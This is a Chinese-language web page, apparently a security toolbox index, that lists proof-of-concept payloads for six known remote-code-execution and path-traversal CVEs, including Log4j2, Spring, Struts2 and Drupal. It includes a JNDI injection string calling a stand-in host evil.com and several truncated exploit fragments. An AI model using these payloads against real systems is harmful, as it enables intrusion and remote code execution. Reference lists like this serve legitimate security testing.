跳到主要内容
工具箱 > 漏洞POC

漏洞POC

常见漏洞POC与利用代码

6 个POC6 个CVE5 个仓库9 个标签
← 返回工具箱

Log4j2 JNDI注入

CVE-2021-44228

Apache Log4j2 存在JNDI注入漏洞,可导致远程代码执行

Payload
${jndi:ldap://evil.com/a}
RCEJNDIJava
仓库 →

Spring Core RCE

CVE-2022-22965

Spring Framework 远程代码执行漏洞

Payload
class.module.getClassLoader().addUrl...
RCESpringJava
仓库 →

ThinkPHP RCE

CVE-2018-20062

ThinkPHP 远程代码执行漏洞

Payload
?s=index/think\app/invokefunction&function=call_user_func_array...
RCEPHP
仓库 →

Apache Struts2 RCE

CVE-2017-5638

Apache Struts2 远程代码执行漏洞

Payload
%{#context["com.opensymphony.xwork2"].getValue("memberAccess").excludedClasses}
RCEStrutsJava

Drupalgeddon2

CVE-2018-7600

Drupal Core 远程代码执行漏洞

Payload
user/%2$|%20whoami%20%7C
RCEDrupalPHP
仓库 →

WinRAR ACE

CVE-2018-20250

WinRAR 目录穿越漏洞,可执行任意代码

Payload
acefile.extract(target, items=content)
文件遍历WinRAR
仓库 →